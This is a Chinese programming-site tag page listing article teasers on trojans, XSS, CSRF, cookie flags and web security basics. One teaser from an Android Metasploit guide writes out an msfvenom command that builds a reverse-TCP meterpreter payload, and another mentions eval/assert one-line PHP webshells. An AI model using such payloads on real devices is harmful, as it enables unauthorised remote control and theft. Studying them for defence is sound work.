E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
木马跨站
关于MSF手机渗透
木马
制作
基于Metasploit的Android渗透测试防御指南⚠️法律声明本文所有技术内容仅用于安全研究,严禁非法使用!测试需获得合法授权。一、环境搭建#Kali基础环境sudoaptupdate&&sudoaptinstall-ymetasploit-frameworkapktool二、载荷生成msfvenom-pandroid/meterpreter/reverse_tcp\LHOST=your_v
嗨起飞了
·
2025-03-03 09:22
网络安全
网络攻击模型
网络安全
老毛桃、大白菜、微PE几款PE优劣对比
微PE:被公认为最纯净的PE工具箱,无任何广告推广、无病毒及
木马
,也不会篡改浏览器主页或添加多余软件启动项。
小魚資源大雜燴
·
2025-03-02 09:00
windows
CSRF
跨站
请求伪造漏洞
原理当一个网站A使用Cookie,存储Session或Token来用于单点登录和权限操作时。浏览器将Cookie存储到浏览器中。当用户在访问另一个网站V时,黑客可以通过伪造表单,向网站A发送修改重要信息(如密码)、支付等操作,浏览器会自动携带Cookie。在服务端看来这就是一个正常的请求,于是在用户不知情的情况下,做出响应。两个条件用户访问站点A并产生了Cookie用户没有退出站点A(清除Cook
看繁星aa
·
2025-03-01 06:46
csrf
http
网络安全
web安全
如何设置HTTPOnly和Secure Cookie标志?
这两个标志帮助防止
跨站
脚本攻击(XSS)和中间人攻击(MitM)。下面是关于如何设置这些标志的具体步骤:设置方法在服务器端设置根据你的服务器端技术栈不同,设置方法也会有所差异。
涔溪
·
2025-03-01 05:03
HTTPOnly
Secure
Cookie
对抗启发式代码仿真检测技术分析
最近在研究病毒的检测技术,虽然在这个
木马
、流氓件猖獗的年代,检测技术(除了考虑效率因素外)已经变得不是十分重要了。但俺仍然出于兴趣想从这里面寻找些思路。
betteroneisme
·
2025-02-28 10:26
随便看看
启发式
恶意代码检测
网络安全攻击类型有哪些 网络安全常见攻击手段
1.XSS攻击(CrossSiteScripting)全称
跨站
脚本攻击是一种常见的攻击手段之一,攻击者主要通过嵌入恶意脚本程序,当用户打开网页时,脚本程序便在客户端的浏览器中执行,以盗取客户端cookie
Hacker_xingchen
·
2025-02-27 23:11
web安全
安全
XSS 与 CSRF 攻击你了解多少呢
一、XSS攻击深度剖析(一)概念溯源与攻击本质XSS,即
跨站
脚本攻击,其核心在于攻击者利用网站对用户输入数据处理的漏洞,将恶意脚本注入网页。
银之夏雪丶
·
2025-02-26 00:24
安全
网络
web安全
前端
javascript
react.js
国内网络安全 沙箱
基本概念
跨站
请求伪造,通常缩写为CSRF或者XSRF。是一种通过网站对用户网页浏览器的信任,使用户在当前已登录的Web程序上执行非本意的操作的攻击方法。
Hacker_Nightrain
·
2025-02-25 08:02
web安全
网络
安全
国内外网络安全现状分析
一、国内网络安全现状1.1国内网络安全威胁国内的网络安全威胁主要表现在以下几个方面:恶意软件:包括计算机病毒、蠕虫、
木马
和间谍软件等,它们能感染计算机系统、窃取敏感信息或破坏系统功能。
黑龙江亿林等级保护测评
·
2025-02-24 22:20
web安全
安全
服务器
网络安全
微信
DeepSeek 与网络安全:AI 在网络安全领域的应用与挑战
从传统的病毒、
木马
攻击,到高级持续性威胁(APT)、零日漏洞和供应链攻击,网络威胁的形式日益复杂。
一ge科研小菜菜
·
2025-02-24 01:49
人工智能
运维
网络
[网络安全]XSS之Cookie外带攻击姿势详析
概念XSS的Cookie外带攻击就是一种针对Web应用程序中的XSS(
跨站
脚本攻击)漏洞进行的攻击,攻击者通过在XSS攻击中注入恶意脚本,从而窃取用户的Cookie信息。
Hacker_LaoYi
·
2025-02-22 09:40
web安全
xss
安全
常见网络攻击以及防御方法大全,零基础入门到精通,收藏这一篇就够了
木马
攻击原理C/S架构,服务器端被植入目标主机,服务器端通过反弹连接和客户端连接。从而客户端对其进行控制。病毒一些恶意的计算机程序,具有传播性,破坏性,隐蔽性的特点。
网安导师小李
·
2025-02-21 18:28
程序员
编程
网络安全
网络
web安全
前端
运维
安全
python
java
XSS 与 CSRF 攻击你了解多少呢
一、XSS攻击深度剖析(一)概念溯源与攻击本质XSS,即
跨站
脚本攻击,其核心在于攻击者利用网站对用户输入数据处理的漏洞,将恶意脚本注入网页。
·
2025-02-21 02:44
javascript前端安全
html网络安全工具源码 网络安全前端
点击文末小卡片,免费获取网络安全全套资料,资料在手,涨薪更快前端常见的网络安全包括:xss(
跨站
脚本攻击)、csrf(
跨站
请求伪造)、sql注入攻击等。
网络安全queen
·
2025-02-21 01:52
web安全
安全
网络安全常识
什么是
木马
?
木马
是一种带有恶意性质的远程
网络安全Ash
·
2025-02-20 15:24
web安全
网络
安全
网络安全常识
XSS(
跨站
脚本攻击)最常见的是cookie劫持,简单来说就是我们用浏览器登录一个网站,主要是用存在客户端浏览器里的cookie来保存客户唯一标识的令牌,在Java写就的网站里,是一个jsessioni
网络安全queen
·
2025-02-20 00:49
网络
网络安全
网络协议
web安全
青少年编程与数学 02-009 Django 5 Web 编程 23课题、安全性
青少年编程与数学02-009Django5Web编程23课题、安全性一、安全性安全性的定义安全性的关键方面安全性的实现方法安全性的挑战安全性的最佳实践二、安全漏洞1.注入漏洞2.
跨站
脚本(XSS)漏洞3
明月看潮生
·
2025-02-19 09:13
编程与数学
第02阶段
青少年编程
django
编程与数学
python
网络安全
深入了解 AppScan 工具的使用:筑牢 Web 应用安全防线
一、探秘AppScan:功能与原理剖析AppScan的核心功能是模拟黑客的多样化攻击手段,对Web应用程序展开全方位、无死角的深度扫描,从而揪出隐藏其中的SQL注入、
跨站
脚本(XSS)、文
垚垚 Securify 前沿站
·
2025-02-18 22:01
十大漏洞
网络
安全
前端
web安全
系统安全
运维
网络安全常识
XSS(
跨站
脚本攻击)最常见的是cookie劫持,简单来说就是我们用浏览器登录一个网站,主要是用存在客户端浏览器里的cookie来保存客户唯一标识的令牌,在Java写就的网站里,是一个jsessioni
网络安全-老纪
·
2025-02-17 10:22
web安全
安全
解决方案之高效检测PDF文件中的XSS攻击问题
然而,PDF文件的安全性问题也日益凸显,尤其是
跨站
脚本攻击(Cross-SiteScripting,XSS)的威胁。
·
2025-02-17 03:57
XSS攻击全貌:原理、分类、检测与防御策略研究
XSS攻击原理的深入剖析
跨站
脚本攻击(Cross-SiteScripting,简称XSS)作为一种广泛存在的web应用程序安全漏洞,其机制在于利用了客户端与服务器之间数据交换过程中的信任链被恶意破坏。
键盘侠伍十七
·
2025-02-15 22:47
web
安全
xss
网络
服务器
web安全
XSS攻击
常见的 Web 攻击方式有哪些,如何防御?
一、XSS攻击(
跨站
脚本攻击)攻击原理:恶意脚本通过用户输入注入页面,分为存储型(数据库持久化)、反射型(URL参数注入)、DOM型(客户端脚本修改)防御方案://1.输入过滤(Node.js示例)constxss
程序员黄同学
·
2025-02-15 21:43
前端开发
JavaScript
Java面试题
前端
Web项目测试专题(七)安全性测试
输入验证:测试所有用户输入点,防止SQL注入、XSS(
跨站
脚本攻击)等常见攻击。安全头配置:检查HTTP安全头(如CSP、X-Fram
2025年一定要上岸
·
2025-02-15 10:48
安全
web安全
xss+csrf的组合拳
今天就把之前学的东西简单的总结一下吧两种漏洞本质XSS漏洞(
跨站
脚本):XSS漏洞的本质是服务端分不清用户输入的内容是数据还是指令代码,从而造成用户输入恶意代码传到服务端执行。
每天都要努力哇
·
2025-02-14 22:09
漏洞合集
CSRF+Self XSS
)poc2.构造csrfpoc3.使用CSRFTester工具生成CSRFpoc3.1打开工具3.2设置浏览器代理3.3用户登录3.4抓取和伪造请求4.访问修改后的url(模仿用户访问)前言CSRF,
跨站
请求攻击
会伏地的向日葵
·
2025-02-14 21:32
csrf
xss
【网络安全】Self XSS + 文件上传CSRF
文章目录正文发现反射点实现XSS
跨站
请求伪造(CSRF)与文件上传结合POC正文在目标网站target.com的“联系我们”表单中,我注意到一个文件上传选项。
秋说
·
2025-02-14 21:28
web安全
漏洞挖掘
[网络安全]XSS之Cookie外带攻击姿势详析
概念XSS的Cookie外带攻击就是一种针对Web应用程序中的XSS(
跨站
脚本攻击)漏洞进行的攻击,攻击者通过在XSS攻击中注入恶意脚本,从而窃取用户的Cookie信息。
网络安全Jack
·
2025-02-14 15:48
web安全
xss
安全
Web 学习笔记 - 网络安全
XSS攻击XSS,
跨站
网络安全Max
·
2025-02-14 12:25
前端
笔记
前端 安全
目录一、
跨站
脚本攻击(XSS)1.反射型XSS2.存储型XSS3.DOM型XSSXSS通用防御二、
跨站
请求伪造(CSRF)三、点击劫持(Clickjacking)四、开放重定向攻击(OpenRedirect
海上彼尚
·
2025-02-14 08:53
js
node.js
前端
安全
php csrf攻击 xss区别,用大白话谈谈XSS与CSRF
国际惯例,先上一下维基百科:XSS:
跨站
脚本(Cross-sitescripting,通常简称为XSS)是一种网站应用程序的安全漏洞攻击
weixin_39922868
·
2025-02-13 08:41
php
csrf攻击
xss区别
详记CSRF攻击与XSS攻击
一、CSRF(
跨站
请求伪造)是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。
DebJane
·
2025-02-13 07:40
前端安全
XSS
CSRF
XSS和CSRF攻击和防御
跨站
脚本攻击(XSS)和
跨站
请求伪造(CSRF)是威胁用户数据安全和网站稳定性的两大主要风险。
无俦N
·
2025-02-13 07:09
xss
csrf
前端
网络安全 | 什么是XSS
跨站
脚本攻击?
关注:CodingTechWorkXSS介绍 XSS(Cross-SiteScripting)即
跨站
脚本攻击,是一种常见的Web安全漏洞。
Andya_net
·
2025-02-11 15:47
网络安全技术
web安全
xss
网络
网站安全测试方案整理
1.漏洞扫描(VulnerabilityScanning)使用工具来扫描网站的已知漏洞,常见的工具包括:OWASPZAPNessusBurpSuiteNikto这些工具可以帮助发现SQL注入、
跨站
脚本(
qq_58647543
·
2025-02-08 16:09
安全
安全
网络
PHP 常见安全验证方法及深度解析
目录PHP常见安全验证方法及深度解析一、输入过滤与验证(一)检查整数(二)检查URL二、密码安全验证(一)密码强度检查三、防止SQL注入(一)参数化查询(如使用PDO)四、防止
跨站
脚本攻击(XSS)(一
阿贾克斯的黎明
·
2025-02-06 04:51
网络安全
php
安全
数据库
文件包含漏洞和上传漏洞
文章目录文件包含漏洞PHP文件包含漏洞远程文件包含漏洞截断包含JSP文件包含文件包含漏洞预防文件上传漏洞解析漏洞服务端检测目录验证文件内容检测预防方法一句话
木马
sql注入,有sql盲注,基于布尔的注入,
小高写BUG
·
2025-02-06 04:20
渗透测试
php
sql
数据库
渗透测试
web安全
揭开
木马
的神秘面纱-DLL
木马
篇
如何在WINNT下隐藏
木马
的进程。本文会详细的分析WINNT中
木马
的几种常用隐藏进程手段,给大家揭示
木马
/后门程序在WINNT中进程隐藏的方法和查找的途径。
sxslyy
·
2025-02-03 14:26
C与C++编程
dll
shell
windows
工具
api
microsoft
安全见闻(3)
常见的脚本语言包括:-Lua-PHP-Go-Python-JavaScript脚本语言可以编写病毒和
木马
,例如Python可以编写
木马
,PHP可以编写一句话
木马
。
Bulestar_xx
·
2025-02-03 09:48
泷羽sec学习笔记
安全
网络
windows
第26节课:内容安全策略(CSP)—构建安全网页的防御盾
属性设置详解指定多个来源配置示例说明常见错误配置实践:CSP与XSS防护示例1:防止内联脚本和样式说明示例2:限制图片来源说明限制与注意事项结语在现代Web开发中,内容安全策略(CSP)是一种强大的工具,用于帮助开发者防止多种安全漏洞,尤其是
跨站
脚本
学问小小谢
·
2025-02-02 22:45
HTML学习
安全
前端
学习
服务器
运维
网络
Nginx与Web安全:遵循OWASP最佳实践
Web应用程序面临着各种威胁,包括SQL注入、
跨站
脚本攻击(XSS)、
跨站
请求伪造(CSRF)等。Nginx作为高性能的HTTP和反向代理服务器,提供了丰富的功能来增强Web应用的安全性。
墨夶
·
2025-02-01 17:45
Nginx学习资料1
nginx
web安全
hibernate
SQL注入漏洞之后渗透 如何利用 利用的点是什么? 一篇文章给你说明白
目录编辑读取服务器敏感文件数据利用注入点能干什么读取数据库数据语句函数group_concat(arg)指令:注意:
木马
相关
木马
写入【挂马】语句:获取后台真实物理路径读取服务器敏感文件数据利用注入点能干什么能读取服务器数据读取敏感文件控制服务器能读写文件就是
浩浩测试一下
·
2025-01-30 17:35
SQL注入漏洞
sql
web安全
数据库
网络安全
网络攻击模型
安全架构
防火墙iptables五链四表
而且它还能禁止特定端口的流出通信,封锁特洛伊
木马
。最后,它可以禁止来自特殊站点的访问,从而防止来自不明入侵者的所有通信。防火墙分为软件防火墙和硬
萧瑟ii
·
2025-01-30 15:15
Linux
安全
前端安全:构建坚不可摧的Web应用防线
本文将深入探讨前端安全的多个维度,包括
跨站
脚本攻击(XSS)、
跨站
请求伪造(CSRF)、内容安全策略(CSP)以及HTTPS的实施,旨在帮助开发者构建更加安全的Web应用。
CodeToGym
·
2025-01-30 06:09
前端
安全
ACTF2020 新生赛 Upload 1
具体步骤如下:1、书写一句话
木马
,例如:eval和assert:php任意代码执行的一句话后门,我们喜欢用的是传统的eval,php5,7通用。
xinjuun
·
2025-01-30 01:04
CTF
网络安全
等保测评过程中通常会遇到哪些常见问题
3.恶意软件风险包括计算机病毒、
木马
、
黑龙江亿林等级保护测评
·
2025-01-29 11:24
安全
网络
web安全
django
大数据
算法
数据结构
198、Django安全攻略:全方位防护Web应用常见漏洞
常见的Web安全漏洞包括:
跨站
脚本攻
多多的编程笔记
·
2025-01-29 11:23
django
安全
前端
渗透测试 - webshell jsp一句话大马 && 蚁剑连接
目录大
木马
webshell大马连接大
木马
<%@pageimport="javax.imageio.*"%&g
浩浩测试一下
·
2025-01-28 12:48
OWASP
Top
漏洞
web渗透
java
开发语言
网络安全
安全
系统安全
web安全
CSP Content Security Policy(内容安全策略)
CSP主要用于防止XSS(
跨站
脚本攻击)和数据注入攻击,通过限制网页中的内容来源(如脚本、样式、图像、媒体等)来降低被恶意代码利用的风险。
睡不着的可乐
·
2025-01-27 23:10
前端
web安全
软硬件漏洞有哪些
**
跨站
脚本(XSS)攻击**:攻击者将
dongxinddd123
·
2025-01-26 19:28
安全
网络
web安全
通用免杀概论
免杀:病毒
木马
免于被杀毒软件查杀,基于免杀的技术包含逆向工程、反汇编、系统漏洞等hack技术企业目前标配防护:EDR(终端主机防护)、IPS、IDS、HDR(流量监控)、XDR(相较于EDR更高级),早期的话
曦梦逐影
·
2025-01-26 15:01
安全
上一页
1
2
3
4
5
6
7
8
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他